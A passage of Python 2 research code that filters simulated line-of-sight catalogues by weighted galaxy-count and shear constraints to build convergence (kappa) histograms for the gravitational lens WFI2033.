constrwidth_mass2overr_meds_inf; constrwidth_weight2_sup = constrwidth_mass2overr_meds_sup\n if weightin2 == \"mass3overr\": constr_weight2 = constr_mass3overr_meds; constrwidth_weight2_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight2_sup = constrwidth_mass3overr_meds_sup\n if weightin2 == \"mass2rms\": constr_weight2 = constr_mass2rms_meds; constrwidth_weight2_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight2_sup = constrwidth_mass2rms_meds_sup\n if weightin2 == \"mass3rms\": constr_weight2 = constr_mass3rms_meds; constrwidth_weight2_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight2_sup = constrwidth_mass3rms_meds_sup\n if weightin2 == \"mass2overrrms\": constr_weight2 = constr_mass2overrrms_meds; constrwidth_weight2_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight2_sup = constrwidth_mass2overrrms_meds_sup\n if weightin2 == \"mass3overrrms\": constr_weight2 = constr_mass3overrrms_meds; constrwidth_weight2_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight2_sup = constrwidth_mass3overrrms_meds_sup\n if weightin2 == \"flexion\": constr_weight2 = constr_flexion_meds; constrwidth_weight2_inf = constrwidth_flexion_meds_inf; constrwidth_weight2_sup = constrwidth_flexion_meds_sup\n if weightin2 == \"tidal\": constr_weight2 = constr_tidal_meds; constrwidth_weight2_inf = constrwidth_tidal_meds_inf; constrwidth_weight2_sup = constrwidth_tidal_meds_sup\n if weightin2 == \"SIS\": constr_weight2 = constr_SIS_meds; constrwidth_weight2_inf = constrwidth_SIS_meds_inf; constrwidth_weight2_sup = constrwidth_SIS_meds_sup\n if weightin2 == \"SIShalo\": constr_weight2 = constr_SIShalo_meds; constrwidth_weight2_inf = constrwidth_SIShalo_meds_inf; 
constrwidth_weight2_sup = constrwidth_SIShalo_meds_sup\n if weightin2 == \"gamma\": constr_weight2 = constr_gamma; constrwidth_weight2_inf = constrwidth_gamma_inf; constrwidth_weight2_sup = constrwidth_gamma_sup\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n if weightin1 == \"gal\": constr_weight1 = constr_gal_meds; constrwidth_weight1_inf = constrwidth_gal_meds_inf; constrwidth_weight1_sup = constrwidth_gal_meds_sup\n if weightin1 == \"z\": constr_weight1 = constr_z_meds; constrwidth_weight1_inf = constrwidth_z_meds_inf; constrwidth_weight1_sup = constrwidth_z_meds_sup\n if weightin1 == \"mass\": constr_weight1 = constr_mass_meds; constrwidth_weight1_inf = constrwidth_mass_meds_inf; constrwidth_weight1_sup = constrwidth_mass_meds_sup\n if weightin1 == \"mass2\": constr_weight1 = constr_mass2_meds; constrwidth_weight1_inf = constrwidth_mass2_meds_inf; constrwidth_weight1_sup = constrwidth_mass2_meds_sup\n if weightin1 == \"mass3\": constr_weight1 = constr_mass3_meds; constrwidth_weight1_inf = constrwidth_mass3_meds_inf; constrwidth_weight1_sup = constrwidth_mass3_meds_sup\n if weightin1 == \"oneoverr\": constr_weight1 = constr_oneoverr_meds; constrwidth_weight1_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight1_sup = constrwidth_oneoverr_meds_sup\n if weightin1 == \"zoverr\": constr_weight1 = constr_zoverr_meds; constrwidth_weight1_inf = constrwidth_zoverr_meds_inf; constrwidth_weight1_sup = constrwidth_zoverr_meds_sup\n if weightin1 == \"massoverr\": constr_weight1 = constr_massoverr_meds; constrwidth_weight1_inf = constrwidth_massoverr_meds_inf; constrwidth_weight1_sup = constrwidth_massoverr_meds_sup\n if weightin1 == \"mass2overr\": constr_weight1 = constr_mass2overr_meds; constrwidth_weight1_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight1_sup = constrwidth_mass2overr_meds_sup\n if weightin1 == \"mass3overr\": constr_weight1 = constr_mass3overr_meds; constrwidth_weight1_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight1_sup = constrwidth_mass3overr_meds_sup\n if weightin1 == \"mass2rms\": constr_weight1 = constr_mass2rms_meds; constrwidth_weight1_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight1_sup = constrwidth_mass2rms_meds_sup\n if weightin1 == \"mass3rms\": constr_weight1 = constr_mass3rms_meds; constrwidth_weight1_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight1_sup = constrwidth_mass3rms_meds_sup\n if weightin1 == \"mass2overrrms\": constr_weight1 = constr_mass2overrrms_meds; constrwidth_weight1_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight1_sup = constrwidth_mass2overrrms_meds_sup\n if weightin1 == \"mass3overrrms\": constr_weight1 = constr_mass3overrrms_meds; constrwidth_weight1_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight1_sup = constrwidth_mass3overrrms_meds_sup\n if weightin1 == \"flexion\": constr_weight1 = constr_flexion_meds; constrwidth_weight1_inf = constrwidth_flexion_meds_inf; constrwidth_weight1_sup = constrwidth_flexion_meds_sup\n if weightin1 == \"tidal\": constr_weight1 = constr_tidal_meds; constrwidth_weight1_inf = constrwidth_tidal_meds_inf; constrwidth_weight1_sup = constrwidth_tidal_meds_sup\n if weightin1 == \"SIS\": constr_weight1 = constr_SIS_meds; constrwidth_weight1_inf = constrwidth_SIS_meds_inf; constrwidth_weight1_sup = constrwidth_SIS_meds_sup\n if weightin1 == \"SIShalo\": constr_weight1 = constr_SIShalo_meds; constrwidth_weight1_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight1_sup = constrwidth_SIShalo_meds_sup\n if weightin1 == 
\"gamma\": constr_weight1 = constr_gamma; constrwidth_weight1_inf = constrwidth_gamma_inf; constrwidth_weight1_sup = constrwidth_gamma_sup\n\nprint \"Reading...\"\n\n#if mode == \"sum\":\n #str1 = \"\"\nif mode == \"meds\":\n str1 = \"med\"\n\nif conjoined == 4:\n output = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s_%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\nif conjoined == 3:\n output = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_%s_increments%s_%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\nif conjoined == 2:\n output = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_increments%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,mag,radius,mode,increment1,increment2)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_LOS_increments%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,mag,radius,mode,increment1,increment2)\nif conjoined == 1:\n output = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_increments%s.cat' % (rootout,lens,innermask,weightin1,mag,radius,mode,increment1)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_LOS_increments%s.cat' % (rootout,lens,innermask,weightin1,mag,radius,mode,increment1)\n\nif conjoined == 1:\n ''' Here I only read the columns of interest, without kappa, for ugriz, in order to find the medians of their values over the whole MS.'''\n med1 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin1 != \"gamma\":\n weight1_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=[weight1_index], unpack=True)\n if i == 0:\n weight1 = weight1_\n else:\n weight1 = np.append(weight1,weight1_)\n else:\n weight1_1_,weight1_2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=[2,3], unpack=True)\n if i == 0:\n weight1_1 = weight1_1_\n weight1_2 = weight1_2_\n else:\n weight1_1 = np.append(weight1_1,weight1_1_)\n weight1_2 = np.append(weight1_2,weight1_2_)\n if weightin1 != \"gamma\":\n med1[j] = np.median(weight1)\n else:\n med1[j] = np.median(np.sqrt(weight1_1**2 + weight1_2**2))\n print j\n med_weight1 = np.mean(med1) # throughout the code I use med_weight1 when computing intervals, following Green et al. For this, weight1 should always refer to simple galaxy number counts\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))]) # absolute number, e.g. 
of galaxies within the lower width\n    E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n    if weightin1 == \"gamma\":\n        constr_weight1 = constr_weight1 / med_weight1 # for gamma, measured shear divided by the median value of shear in MS; this turns it into an overdensity, like the other weights\n    \n    ''' Here I read ugrizJHK, converting weighted counts into overdensities, and recording the kappa values only for overdensities satisfying the constraint. I consider the full range of the constraint.'''\n    for j in range(8):\n        for i in range(8):\n            if weightin1 != \"gamma\":\n                kappa_, weight1_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index), unpack=True)\n                weight1_ = weight1_ / med_weight1\n            else:\n                kappa_, gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,2,3), unpack=True)\n                gamma1 = gamma1_\n                gamma2 = gamma2_\n                gamma = gamma1 # just so that the array has the correct shape\n                gamma = np.sqrt(gamma1**2 + gamma2**2)\n                weight1_ = gamma / med_weight1 # shear expressed as an overdensity relative to the median MS shear\n            weight = np.copy(weight1_)\n            kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ] # convert overdensities into absolute counts\n            weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n            del weight\n            if (i == 0) and (j == 0):\n                kappa = kappa_\n                weight1 = weight1_\n            else:\n                kappa = np.append(kappa,kappa_)\n                weight1 = np.append(weight1,weight1_)\n        print j\n\nif conjoined == 2:\n    med1 = np.zeros(8)\n    med2 = np.zeros(8)\n    for j in range(8):\n        for i in range(8):\n            if weightin2 != \"gamma\":\n                weight1_,weight2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,weight2_index), unpack=True)\n                if i == 0:\n                    weight1 = weight1_\n                    weight2 = weight2_\n                else:\n                    weight1 = np.append(weight1,weight1_)\n                    weight2 = np.append(weight2,weight2_)\n            else:\n                weight1_,weight2_1_,weight2_2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=[weight1_index,1,2], unpack=True)\n                if i == 0:\n                    weight1 = weight1_\n                    weight2_1 = weight2_1_\n                    weight2_2 = weight2_2_\n                else:\n                    weight1 = np.append(weight1,weight1_)\n                    weight2_1 = np.append(weight2_1,weight2_1_)\n                    weight2_2 = np.append(weight2_2,weight2_2_)\n        if weightin2 != \"gamma\":\n            med1[j] = np.median(weight1)\n            med2[j] = np.median(weight2)\n        else:\n            med1[j] = np.median(weight1)\n            med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n        print j\n    med_weight1 = np.mean(med1)\n    med_weight2 = np.mean(med2)\n    E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n    E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n    E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n    E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n    if weightin2 == \"gamma\":\n        constr_weight2 = 
constr_weight2 / med_weight2\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight2_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n else:\n kappa_, weight1_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n print j\n\nif conjoined == 3:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,weight2_index,weight3_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,1,2,weight3_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = 
np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n print j\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight2_index,weight3_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n else:\n kappa_, weight1_,weight3_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight3_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * 
E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n print j\n\nif conjoined == 4:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n med4 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,weight2_index,weight3_index,weight4_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,1,2,weight3_index,weight4_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n print j\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n med_weight4 = np.mean(med4)\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n 
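# Worked example with hypothetical values (illustration only, not taken from the data): if the MS median galaxy count is med_weight1 = 40, the measured overdensity is constr_weight1 = 1.2 and its lower width is constrwidth_weight1_inf = 1.0, then E_w1_inf = np.max([1, round(40 * (1.2 - 1.0))]) = 8, i.e. the 1-sigma constraint half-width expressed as an absolute galaxy count (multiplied by limsigma in the E loops further below); the floor of 1 guarantees a nonzero sampling width.\n    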
E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n E_w4_inf = np.max([1, round(med_weight1 * (constr_weight4 - constrwidth_weight4_inf))])\n E_w4_sup = np.max([1, round(med_weight1 * (-constr_weight4 + constrwidth_weight4_sup))])\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight2_index,weight3_index,weight4_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n else:\n kappa_, weight1_,weight3_,weight4_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight3_index,weight4_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) 
]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n 